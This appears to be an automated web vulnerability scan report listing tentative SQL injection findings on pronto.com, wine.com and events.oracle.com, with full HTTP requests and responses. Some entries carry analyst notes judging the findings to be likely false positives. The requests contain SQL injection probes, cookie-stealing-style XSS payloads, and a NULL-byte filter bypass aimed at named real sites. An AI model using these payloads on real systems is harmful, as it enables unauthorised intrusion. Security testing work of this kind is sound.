Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache-www.pronto.com
Path:   /combine.phpd6bdb

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection. The payloads 13149058'%20or%201%3d1--%20 and 13149058'%20or%201%3d2--%20 were each appended to the first path segment, and the two requests produced different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives; review the requests and responses below before treating this as confirmed. Here both requests return 404 Not Found for a path that does not exist, and the only visible difference between the two bodies is the per-request mid= token in the footer links, which is 27 characters in Response 1 and 25 in Response 2. Across the five footer links shown that is the 10-byte Content-Length difference (93867 versus 93857). A 404 handler that stamps a fresh token into every page will differ on every request regardless of the payload, so this is far more likely an unstable response than an altered query.

Request 1

GET /combine.phpd6bdb13149058'%20or%201%3d1--%20 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93867


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=-4783104c-12ec9955a5f--7a65">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=-4783104c-12ec9955a5f--7a65">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class=
...[SNIP]...

Request 2

GET /combine.phpd6bdb13149058'%20or%201%3d2--%20 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93857


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=6529688a-12ec97d373c-5fb0">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=6529688a-12ec97d373c-5fb0">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=6529688a-12ec97d373c-5fb0">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=6529688a-12ec97d373c-5fb0">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=6529688a-12ec97d373c-5fb0">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class="mainlinks
...[SNIP]...

1.3. http://cache-www.pronto.com/combine.phpd6bdb [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache-www.pronto.com
Path:   /combine.phpd6bdb

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted as a parameter name (not a value), and the two requests produced different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives; review the requests and responses below before treating this as confirmed. Two things argue against this finding: an application rarely places the names of unknown query-string parameters into a SQL statement, and Response 1 is again the site's 404 page with a fresh per-request mid= token in its footer links, the same per-request variation seen in 1.2. Unless the two responses still differ after that token is disregarded, this should be treated as a false positive.

Request 1

GET /combine.phpd6bdb?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93847


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=5d0e9db5-12ec981c808-3238">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=5d0e9db5-12ec981c808-3238">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=5d0e9db5-12ec981c808-3238">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=5d0e9db5-12ec981c808-3238">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=5d0e9db5-12ec981c808-3238">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class="mainlinks
...[SNIP]...

Request 2

GET /combine.phpd6bdb?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93857


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=-4dcd5534-12ec993b392--6e46">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class=
...[SNIP]...

1.4. http://cache-www.pronto.com/combine.phpd6bdb'>9cb9ce2aee9 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache-www.pronto.com
Path:   /combine.phpd6bdb'><script>alert(document.cookie)</script>9cb9ce2aee9

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 22467197'%20or%201%3d1--%20 and 22467197'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /combine.phpd6bdb'><script>alert(document.cookie)</script>9cb9ce2aee9?type=javascript&hash=19&files=&122467197'%20or%201%3d1--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94060


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=77855507-12ec9829e42-7a6">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=77855507-12ec9829e42-7a6">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=77855507-12ec9829e42-7a6">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=77855507-12ec9829e42-7a6">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=77855507-12ec9829e42-7a6">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class="mainlinks link
...[SNIP]...

Request 2

GET /combine.phpd6bdb'><script>alert(document.cookie)</script>9cb9ce2aee9?type=javascript&hash=19&files=&122467197'%20or%201%3d2--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94075


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=-3dc5b240-12ec994f0a1--75a2">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class=
...[SNIP]...

1.6. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache1.wine.com
Path:   /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6' HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:30:10 GMT
Content-Length: 10120
Connection: close
Set-Cookie: ASPSESSIONIDSACATBQR=HJEEHLJBKKHLLOPDMJOJENPA; path=/
Set-Cookie: SL_Audience=208|Accelerated|566|1|0;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com
Set-Cookie: SL_UVId=2B34AE848480099B;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sun, 20-Mar-11 03:30:10 GMT;Path=/;Domain=.wine.com


<html>
<head><script id="slheadjs" type="text/javascript" slHead="/slhead.js?Lo0P=d685fb28d1928bfb05e81f8a7e75d6858383" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Win
...[SNIP]...
){if(this.override)return true;return k("err",false,false)}},
e:function(b,c,d,e){e=e!=null&&e.length>0?"("+encodeURIComponent(e)+")":"";this.err.tLog.unshift(c+":"+d+e);if(typeof b=="undefined")throw Error("undefined");else throw b;},listen:function(b,c,d,e){try{if(b.addEventListener)b.addEventListener(c,d,e);else b.attachEvent&&b.attachEvent("on"+c,d)}catch(h){a.e(h,i,"slhead","r","listen")}},pg:{head:
...[SNIP]...

Request 2

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6'' HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:30:10 GMT
Content-Length: 24259
Connection: close
Set-Cookie: SessionGUID=E05142EF%2D8BA2%2D456D%2DA802%2DB14471788F8C; expires=Sat, 17-Mar-2012 15:30:10 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDSACATBQR=LJEEHLJBGODPOHEOCMMOKADA; path=/
Set-Cookie: SL_Audience=401|Accelerated|312|1|0;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...

1.7. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache1.wine.com
Path:   /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:30:03 GMT
Content-Length: 10120
Connection: close
Set-Cookie: ASPSESSIONIDSACATBQR=GFEEHLJBEONPCFCDBHLNACOH; path=/
Set-Cookie: SL_Audience=405|Accelerated|359|1|0;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com
Set-Cookie: SL_UVId=2B34AE80CC47463F;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sun, 20-Mar-11 03:30:03 GMT;Path=/;Domain=.wine.com


<html>
<head><script id="slheadjs" type="text/javascript" slHead="/slhead.js?Lo0P=d685fb28d1928bfb05e81f8a7e75d6858383" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Win
...[SNIP]...
){if(this.override)return true;return k("err",false,false)}},
e:function(b,c,d,e){e=e!=null&&e.length>0?"("+encodeURIComponent(e)+")":"";this.err.tLog.unshift(c+":"+d+e);if(typeof b=="undefined")throw Error("undefined");else throw b;},listen:function(b,c,d,e){try{if(b.addEventListener)b.addEventListener(c,d,e);else b.attachEvent&&b.attachEvent("on"+c,d)}catch(h){a.e(h,i,"slhead","r","listen")}},pg:{head:
...[SNIP]...

Request 2

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 24257
Content-Type: text/html
Cache-Control: private
Date: Fri, 18 Mar 2011 15:30:03 GMT
Connection: close
Set-Cookie: SessionGUID=0F9DF072%2D33F8%2D4BD5%2DBAEE%2DEBA7BB4C65D8; expires=Sat, 17-Mar-2012 15:30:02 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDSACATBQR=IFEEHLJBJMECHAODNBEAOAGO; path=/
Set-Cookie: SL_Audience=720|Unaccelerated|42|1|0;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Unaccelerated;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...

1.8. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache1.wine.com
Path:   /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6?1'=1 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:29:53 GMT
Content-Length: 10120
Connection: close
Set-Cookie: ASPSESSIONIDSACATBQR=HMDEHLJBLMIEGFMAHEOLFLPM; path=/
Set-Cookie: SL_Audience=234|Accelerated|305|1|0;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com
Set-Cookie: SL_UVId=2B34AE7B1E382A4F;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sun, 20-Mar-11 03:29:53 GMT;Path=/;Domain=.wine.com


<html>
<head><script id="slheadjs" type="text/javascript" slHead="/slhead.js?Lo0P=d685fb28d1928bfb05e81f8a7e75d6858383" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Win
...[SNIP]...
){if(this.override)return true;return k("err",false,false)}},
e:function(b,c,d,e){e=e!=null&&e.length>0?"("+encodeURIComponent(e)+")":"";this.err.tLog.unshift(c+":"+d+e);if(typeof b=="undefined")throw Error("undefined");else throw b;},listen:function(b,c,d,e){try{if(b.addEventListener)b.addEventListener(c,d,e);else b.attachEvent&&b.attachEvent("on"+c,d)}catch(h){a.e(h,i,"slhead","r","listen")}},pg:{head:
...[SNIP]...

Request 2

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6?1''=1 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:29:53 GMT
Content-Length: 24262
Connection: close
Set-Cookie: SessionGUID=E5197301%2D0875%2D47ED%2DA16B%2D664BE3D734B9; expires=Sat, 17-Mar-2012 15:29:52 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDSACATBQR=LMDEHLJBHJIKFLMCPOAKBOJL; path=/
Set-Cookie: SL_Audience=179|Accelerated|187|1|0;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...

1.9. http://events.oracle.com/search/search [9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The 9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the 9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e=1'%20and%201%3d1--%20 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=0;ecid=120492918608,0)
Date: Fri, 18 Mar 2011 15:36:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177068


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Rio De Janeiro</i> </td>
</tr>
